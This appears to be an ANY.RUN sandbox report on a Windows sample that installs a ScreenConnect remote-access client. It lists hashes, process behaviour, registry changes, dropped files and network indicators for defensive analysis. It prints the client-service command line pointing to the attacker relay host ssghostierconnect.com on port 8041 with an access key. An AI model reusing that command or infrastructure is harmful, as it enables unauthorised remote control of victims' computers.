File name:

Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b

Full analysis: https://app.any.run/tasks/0843aec7-0213-4806-a362-e689839b4da3
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that lets attackers gain full or partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common RAT features are access to the user's data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Analysis date: May 16, 2025, 12:45:03
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
screenconnect
rat
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

51484F0C0F9854F9F74CA609569CE11B

SHA1:

DFA1C058AF0433DB147F759D206C5C57C0693A7E

SHA256:

B7B65DBD30AD4B73017275BF43F046B3EC0B76C1F55898E092FD5340FF9C2B7B

SSDEEP:

1536:lejLH3MVw8licIgWQog5Mzg+MoCdqQsWQcd69jPVfq7NKEH:8jLHcVw8licpWQog5Ms+f+l6xPVfqnH

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Adds/modifies Windows certificates

      • Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe (PID: 7864)
      • dfsvc.exe (PID: 7904)
    • Reads security settings of Internet Explorer

      • dfsvc.exe (PID: 7904)
      • ScreenConnect.WindowsClient.exe (PID: 6044)
      • ScreenConnect.ClientService.exe (PID: 7320)
    • Reads Internet Explorer settings

      • dfsvc.exe (PID: 7904)
    • Executable content was dropped or overwritten

      • dfsvc.exe (PID: 7904)
    • The process creates files with name similar to system file names

      • dfsvc.exe (PID: 7904)
    • Reads the date of Windows installation

      • ScreenConnect.WindowsClient.exe (PID: 6044)
      • dfsvc.exe (PID: 7904)
    • Executes application which crashes

      • ScreenConnect.ClientService.exe (PID: 7320)
    • Connects to unusual port

      • ScreenConnect.WindowsClient.exe (PID: 6044)
    • There is functionality for taking screenshot (YARA)

      • ScreenConnect.WindowsClient.exe (PID: 6044)
    • Detects ScreenConnect RAT (YARA)

      • ScreenConnect.WindowsClient.exe (PID: 6044)
  • INFO

    • Reads the computer name

      • Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe (PID: 7864)
      • dfsvc.exe (PID: 7904)
      • ScreenConnect.WindowsClient.exe (PID: 6044)
      • ScreenConnect.ClientService.exe (PID: 7320)
    • Reads the machine GUID from the registry

      • Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe (PID: 7864)
      • dfsvc.exe (PID: 7904)
      • ScreenConnect.ClientService.exe (PID: 7320)
      • ScreenConnect.WindowsClient.exe (PID: 6044)
    • Checks supported languages

      • dfsvc.exe (PID: 7904)
      • Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe (PID: 7864)
      • ScreenConnect.WindowsClient.exe (PID: 6044)
      • ScreenConnect.ClientService.exe (PID: 7320)
    • Reads Environment values

      • dfsvc.exe (PID: 7904)
      • ScreenConnect.WindowsClient.exe (PID: 6044)
    • Checks proxy server information

      • dfsvc.exe (PID: 7904)
      • slui.exe (PID: 2692)
      • ScreenConnect.WindowsClient.exe (PID: 6044)
    • Disables trace logs

      • dfsvc.exe (PID: 7904)
      • ScreenConnect.WindowsClient.exe (PID: 6044)
    • Process checks whether UAC notifications are on

      • dfsvc.exe (PID: 7904)
    • Creates files or folders in the user directory

      • dfsvc.exe (PID: 7904)
      • ScreenConnect.WindowsClient.exe (PID: 6044)
      • WerFault.exe (PID: 1164)
    • Create files in a temporary directory

      • dfsvc.exe (PID: 7904)
    • Reads the software policy settings

      • dfsvc.exe (PID: 7904)
      • slui.exe (PID: 2692)
    • Process checks computer location settings

      • dfsvc.exe (PID: 7904)
      • ScreenConnect.WindowsClient.exe (PID: 6044)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (64.6)
.dll | Win32 Dynamic Link Library (generic) (15.4)
.exe | Win32 Executable (generic) (10.5)
.exe | Generic Win/DOS Executable (4.6)
.exe | DOS Executable Generic (4.6)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2022:11:18 19:55:37+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.33
CodeSize: 40448
InitializedDataSize: 32768
UninitializedDataSize: -
EntryPoint: 0x14ba
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
No data.
All screenshots are available in the full report
Total processes
132
Monitored processes
6
Malicious processes
3
Suspicious processes
0

Behavior graph

Processes in the graph: sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe, dfsvc.exe, screenconnect.windowsclient.exe (#SCREENCONNECT), screenconnect.clientservice.exe, werfault.exe, slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
PID: 1164
CMD: C:\WINDOWS\SysWOW64\WerFault.exe -u -p 7320 -s 1248
Path: C:\Windows\SysWOW64\WerFault.exe
Parent process: ScreenConnect.ClientService.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
PID: 2692
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 6044
CMD: "C:\Users\admin\AppData\Local\Apps\2.0\9NAGMGHP.QMJ\PJCLX5QJ.A3R\scre..tion_25b0fbb6ef7eb094_0017.0002_bac79e7ade954b90\ScreenConnect.WindowsClient.exe"
Path: C:\Users\admin\AppData\Local\Apps\2.0\9NAGMGHP.QMJ\PJCLX5QJ.A3R\scre..tion_25b0fbb6ef7eb094_0017.0002_bac79e7ade954b90\ScreenConnect.WindowsClient.exe
Parent process: dfsvc.exe
User:
admin
Company:
ScreenConnect Software
Integrity Level:
MEDIUM
Description:
Version:
23.2.9.8466
Modules
Images
c:\users\admin\appdata\local\apps\2.0\9nagmghp.qmj\pjclx5qj.a3r\scre..tion_25b0fbb6ef7eb094_0017.0002_bac79e7ade954b90\screenconnect.windowsclient.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID: 7320
CMD: "C:\Users\admin\AppData\Local\Apps\2.0\9NAGMGHP.QMJ\PJCLX5QJ.A3R\scre..tion_25b0fbb6ef7eb094_0017.0002_bac79e7ade954b90\ScreenConnect.ClientService.exe" "?y=Guest&h=ssghostierconnect.com&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&r=&i=" "5"
Path: C:\Users\admin\AppData\Local\Apps\2.0\9NAGMGHP.QMJ\PJCLX5QJ.A3R\scre..tion_25b0fbb6ef7eb094_0017.0002_bac79e7ade954b90\ScreenConnect.ClientService.exe
Parent process: ScreenConnect.WindowsClient.exe
User:
admin
Integrity Level:
HIGH
Exit code:
3762504530
Version:
23.2.9.8466
Modules
Images
c:\users\admin\appdata\local\apps\2.0\9nagmghp.qmj\pjclx5qj.a3r\scre..tion_25b0fbb6ef7eb094_0017.0002_bac79e7ade954b90\screenconnect.clientservice.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shlwapi.dll
PID: 7864
CMD: "C:\Users\admin\Desktop\Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe"
Path: C:\Users\admin\Desktop\Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe
Parent process: explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
1
Modules
Images
c:\users\admin\desktop\sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\crypt32.dll
PID: 7904
CMD: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Parent process: Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ClickOnce
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\dfsvc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
Total events
12 072
Read events
11 868
Write events
177
Delete events
27

Modification events

Process: (7864) Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation: delete value
Name: 7B0F360B775F76C94A12CA48445AA2D2A875701C
Value:

Process: (7864) Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Operation: write
Name: Blob
Value:
Process: (7864) Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation: delete value
Name: 4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Value:

Process: (7864) Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Operation: write
Name: Blob
Value:
Process: (7904) dfsvc.exe
Key: HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation: write
Name: ComponentStore_RandomString
Value: OYH1V78WB4B4JOVBAB8P4DY3

Process: (7904) dfsvc.exe
Key: HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation: delete value
Name: ComponentStore_RandomString
Value: OYH1V78WB4B4JOVBAB8P4DY3

Process: (7904) dfsvc.exe
Key: HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation: delete key
Name: (default)
Value:

Process: (7904) dfsvc.exe
Key: HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation: write
Name: ComponentStore_RandomString
Value: 9NAGMGHPQMJPJCLX5QJA3RW5

Process: (7904) dfsvc.exe
Key: HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager
Operation: write
Name: StateStore_RandomString
Value: 1E9NOLQPTM1X1TB4PZ9592LE

Process: (7904) dfsvc.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
Operation: write
Name: EnableFileTracing
Value: 0
Executable files
14
Suspicious files
20
Text files
30
Unknown types
1

Dropped files

PID
Process
Filename
Type
PID: 7904 | Process: dfsvc.exe | Type: xml
Filename: C:\Users\admin\AppData\Local\Temp\Deployment\GWRY69DK.ZBK\L64A83RX.D31\ScreenConnect.WindowsClient.exe.manifest
MD5: 9165412EE08839B9702BD4971864A133
SHA256: 6BB1C1AA5663AD33EDA2256037DA8E7439502C206D4C0047270A2FD1F006BB50

PID: 7904 | Process: dfsvc.exe | Type: executable
Filename: C:\Users\admin\AppData\Local\Temp\Deployment\GWRY69DK.ZBK\L64A83RX.D31\ScreenConnect.Core.dll
MD5: 6C5D0928642BF37CEED295B984E05BE2
SHA256: 3B0C45370CA9295881EF5E9D14402C42DFB45803F54D542E6A7E595A05F365A1

PID: 7904 | Process: dfsvc.exe | Type: xml
Filename: C:\Users\admin\AppData\Local\Temp\Deployment\GWRY69DK.ZBK\L64A83RX.D31\ScreenConnect.WindowsClient.exe.config
MD5: 728175E20FFBCEB46760BB5E1112F38B
SHA256: 87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077

PID: 7904 | Process: dfsvc.exe | Type: executable
Filename: C:\Users\admin\AppData\Local\Temp\Deployment\GWRY69DK.ZBK\L64A83RX.D31\ScreenConnect.Windows.dll
MD5: 254D64388C6C52228D7A921960A03F6B
SHA256: 05E78416A344F74095E36FF14BAA719867E9E163E1AE9A96C29DF8615748B0AE

PID: 7904 | Process: dfsvc.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\Deployment\GWRY69DK.ZBK\L64A83RX.D31\ScreenConnect.WindowsClient.exe:Zone.Identifier
MD5: FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA256: EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913

PID: 7904 | Process: dfsvc.exe | Type: xml
Filename: C:\Users\admin\AppData\Local\Temp\Deployment\GWRY69DK.ZBK\L64A83RX.D31\ScreenConnect.Windows.dll.genman
MD5: 9A91308C9B52B96C012F0C14581D4445
SHA256: 293E2EAFED2E158BAA0E2C7C855AD68618B7FEF29FBC799AA0BDF551E2C93300

PID: 7904 | Process: dfsvc.exe | Type: executable
Filename: C:\Users\admin\AppData\Local\Temp\Deployment\GWRY69DK.ZBK\L64A83RX.D31\ScreenConnect.Client.dll
MD5: 32D230704C43F4BF811CE214FA23700B
SHA256: 3B0CD76C1D949D6D6E4073C73E637C531BAC18827F9EC02A6BE6C5E6BBCFE368

PID: 7904 | Process: dfsvc.exe | Type: xml
Filename: C:\Users\admin\AppData\Local\Temp\Deployment\GWRY69DK.ZBK\L64A83RX.D31\ScreenConnect.ClientService.dll.genman
MD5: 5FF58A84F45FB37155AD9506016E01E0
SHA256: 19793A0F7348C3AD051E370D3AF533FE2D105B2187EAEAB9BCE49BE9AC77C8D7

PID: 7904 | Process: dfsvc.exe | Type: xml
Filename: C:\Users\admin\AppData\Local\Temp\Deployment\Q9MVEXJ2.CEY\Z3AW0BVV.8PG.application
MD5: A51027818F34FC5ACA94AF3975E82112
SHA256: 9BA8267A16A16228FF01A9B3AA5648B1EF4D8A99326DFCDCBEB3D20BFDC7E958

PID: 7904 | Process: dfsvc.exe | Type: binary
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1693682860-607145093-2874071422-1001\932a2db58c237abd381d22df4c63a04a_bb926e54-e3ca-40fd-ae90-2764341e7792
MD5: D2DED43CE07BFCE4D1C101DFCAA178C8
SHA256: 8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
54
DNS requests
16
Threats
8

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
7904 | dfsvc.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxXWRM3y5nP%2Be6mK4cD08CEAitQLJg0pxMn17Nqb2Trtk%3D | unknown | - | - | whitelisted
7904 | dfsvc.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rhvv%2BYXsIiGX0TkICEAuTYAUbzPZmQpmJmNW6l84%3D | unknown | - | - | whitelisted
4688 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl | unknown | - | - | whitelisted
4688 | SIHClient.exe | GET | 200 | 23.216.77.39:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl | unknown | - | - | whitelisted
7904 | dfsvc.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEA6bGI750C3n79tQ4ghAGFo%3D | unknown | - | - | whitelisted
4688 | SIHClient.exe | GET | 200 | 23.216.77.39:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | whitelisted
4688 | SIHClient.exe | GET | 200 | 23.216.77.39:80 | http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl | unknown | - | - | whitelisted
4688 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | - | - | whitelisted
4688 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl | unknown | - | - | whitelisted
4688 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl | unknown | - | - | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
- | - | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
- | - | 172.211.123.249:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
- | - | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
- | - | 40.126.32.74:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
6544 | svchost.exe | 40.126.32.74:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
3216 | svchost.exe | 172.211.123.249:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
7904 | dfsvc.exe | 23.95.173.124:443 | ssghostierconnect.com | AS-COLOCROSSING | US | unknown
7904 | dfsvc.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted
2112 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 51.104.136.2
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
google.com
  • 172.217.16.206
whitelisted
login.live.com
  • 40.126.32.74
  • 20.190.160.130
  • 40.126.32.76
  • 20.190.160.128
  • 40.126.32.138
  • 20.190.160.5
  • 40.126.32.136
  • 40.126.32.68
whitelisted
ssghostierconnect.com
  • 23.95.173.124
malicious
ocsp.digicert.com
  • 2.17.190.73
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
crl.microsoft.com
  • 23.216.77.39
  • 23.216.77.25
  • 23.216.77.27
  • 23.216.77.7
  • 23.216.77.13
  • 23.216.77.11
  • 23.216.77.21
  • 23.216.77.12
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.85.23.206
whitelisted

Threats

PID | Process | Class | Message
- | - | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP
- | - | Misc activity | ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)
- | - | A Network Trojan was detected | ET MALWARE Possible Windows executable sent when remote host claims to send html content
- | - | Misc activity | ET INFO Packed Executable Download
- | - | A Network Trojan was detected | ET MALWARE Possible Windows executable sent when remote host claims to send html content
- | - | A Network Trojan was detected | ET MALWARE Possible Windows executable sent when remote host claims to send html content
- | - | A Network Trojan was detected | ET MALWARE Possible Windows executable sent when remote host claims to send html content
- | - | A Network Trojan was detected | ET MALWARE Possible Windows executable sent when remote host claims to send html content
No debug info